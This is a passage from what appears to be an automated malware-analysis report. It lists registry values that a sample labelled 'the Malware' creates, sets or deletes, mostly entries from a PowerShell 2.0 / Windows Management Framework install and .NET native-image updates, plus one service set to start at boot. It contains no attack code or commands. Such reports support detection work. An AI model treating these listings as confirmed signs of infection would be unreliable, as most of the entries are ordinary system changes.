"Install" = "1"

[HKCR\Microsoft.PowerShellScript.1\DefaultIcon]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe,1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\VersionIndependentProgID]
"(Default)" = "WSMan.InternalAutomation"

[HKCR\Microsoft.PowerShellData.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"seRVicemAIN" = "ServiceMain"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"TypesSupported" = "7"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledBy" = "%CurrentUserName%"

[HKCR\Microsoft.PowerShellData.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"AppID" = "{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerVersion" = "6.1.29.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayIcon" = "%System%\WindowsPowerShell\v1.0\WTRInstaller.ico"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\7c4:b0b50\iis]
"PathIISSamples" = "C:\Inetpub\iissamples"

[HKCR\.psc1]
"Content Type" = "application/PowerShell"

[HKCR\Microsoft.PowerShellXmlData.1]
"EditFlags" = "131072"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}]
"(Default)" = "WSMan InternalAutomation Class"

[HKCR\Microsoft.PowerShellData.1]
"EditFlags" = "131072"

[HKCR\Microsoft.PowerShellXmlData.1]
"FriendlyTypeName" = "Windows PowerShell XML Document"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ErrorControl" = "1"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"ARPLink" = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}]
"(Default)" = "IWSManResourceLocatorInternal"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"AutoBackupLogFiles" = "0"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKCR\WSMan.InternalAutomation\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoRepair" = "1"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}]
"(Default)" = "WinRM WMI Provider for User Profile"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"UninstallString" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\WSMan.Automation.1]
"(Default)" = "WSMan Automation Class"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"RuntimeVersion" = "v2.0.50727"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}]
"(Default)" = "IWSManProvHost"

[HKCR\Microsoft.PowerShellModule.1]
"FriendlyTypeName" = "Windows PowerShell Script Module"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageVersion" = "1.0"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"ThreadingModel" = "Both"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"ServerExecutable" = "%System%\winrshost.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayName" = "Windows Management Framework Core"
"InstallDate" = "20160302"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\7c4:b0b50\iis]
"PathInetsrv" = "%System%\inetsrv"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"Publisher" = "Microsoft Corporation"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"AllowProtectedRenames" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"ReleaseType" = "Software Update"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\NumMethods]
"(Default)" = "4"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsDelSignature"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}]
"(Default)" = "IWSMan"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PowerShellVersion" = "2.0"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\ProgID]
"(Default)" = "WSMan.Automation.1"

[HKCR\Microsoft.PowerShellScript.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnGroup" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\7c4:b0b50\iis]
"PathIISAdmin" = "%System%\inetsrv\iisadmin"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}]
"(Default)" = "WSMan Automation Class"

[HKCR\Microsoft.PowerShellScript.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "IHost"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Publisher" = "Microsoft Corporation"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\7c4:b0b50\iis]
"PathWWWRoot" = "C:\Inetpub\wwwroot"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"(Default)" = "%System%\wsmplpxy.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ApplicationBase" = "%System%\WindowsPowerShell\v1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerName" = "Update.exe"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"AppID" = "{3feb2f63-0eec-4b96-84ab-da1307e0117c}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageName" = "Windows Management Framework Core"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Microsoft.PowerShellScript.1]
"FriendlyTypeName" = "Windows PowerShell Script"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Description" = "Allows access to management information from local and remote machines."

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\7c4:b0b50\iis]
"PathFTPRoot" = "C:\Inetpub\ftproot"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}]
"(Default)" = "IWSManSession"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"HelpLink" = "http://go.microsoft.com/fwlink/?LinkID=163790"

[HKCR\WSMan.InternalAutomation.1]
"(Default)" = "WSMan Internal Class"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Type" = "Update"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\.psm1]
"(Default)" = "Microsoft.PowerShellModule.1"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\HELPDIR]
"(Default)" = "%System%"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsVerifyHash"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsCreateHash"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.inf" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\WSMan.Automation]
"(Default)" = "WSMan Automation Class"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"file" = "%systemroot%\system32\config\EventForwarding-Operational.Evt"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsIsMyFileType"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"URLInfoAbout" = "http://go.microsoft.com/fwlink/?LinkID=163792"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"RegistryLocation" = " HKLM,SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\NumMethods]
"(Default)" = "4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"TypesSupported" = "7"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"Guid" = "24b9a175-8716-40e0-9b2b-785de75b1e67"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"SupportsCompatListeners" = "1"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "IShell"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"(Default)" = "%System%\winrmprov.dll"

[HKCR\.ps1]
"(Default)" = "Microsoft.PowerShellScript.1"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ObjectName" = "NT AUTHORITY\NetworkService"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"(Default)" = "%System%\winrshost.exe"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"Active" = "1"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"PID" = "89383-100-0001260-04309"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostAssemblyName" = "Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"

[HKCR\.psd1]
"(Default)" = "Microsoft.PowerShellData.1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}]
"(Default)" = "IWSManEnumerator"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"ServicePackCachePath" = "c:\windows\ServicePackFiles\ServicePackCache"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"EventMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"Version" = "1.0"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\SENS]
"Start" = "2"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\7c4:b0b50]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\7c4:b0b50\iis]

The process mscorsvw.exe:2712 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"
"Status" = "4098"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"SIG" = "3C 55 A6 91 EF 61 21 4C 93 C9 D8 16 A5 41 D7 5A"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigMask" = "4361"
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"MVID" = "DC 19 F5 0C 5E 84 E7 22 34 33 CC 70 9E 7E B4 3F"
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 B0 BC 9F 55 FE A9 24 44 C9 E0 A1 1D FC D5 0C"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "94"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"LastModTime" = "58 2D 46 39 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]

The process mscorsvw.exe:592 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D 3E D0 FA 99 27 E1 34 28 6F BC 3A 2A 7B 7C 9D"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ILDependencies" = "44 18 F2 39 EC CB 26 0B 6F 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index64]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ConfigMask" = "4361"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "100"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2644b2e9\635b32a7]
"66" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ConfigString" = "ZAP--0000-0000"
"MVID" = "9D 8E 8F 7B 7A E9 50 D8 65 44 54 05 97 83 7B 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f\InvertDependencies\2644b2e9\635b32a7]
"66" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"DisplayName" = "Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35"
"Status" = "0"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index64]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2644b2e9\635b32a7]
"66" = ""

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]

The process mscorsvw.exe:4084 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"DisplayName" = "Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"SIG" = "65 39 A0 50 E9 4F 14 4B 85 A8 07 D9 00 B9 C9 79"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"LastModTime" = "FC C0 1C 3A 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ConfigMask" = "4361"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"MVID" = "B1 10 6C EC A9 F5 C8 9E A5 7E 9E CD 46 C7 CF 57"
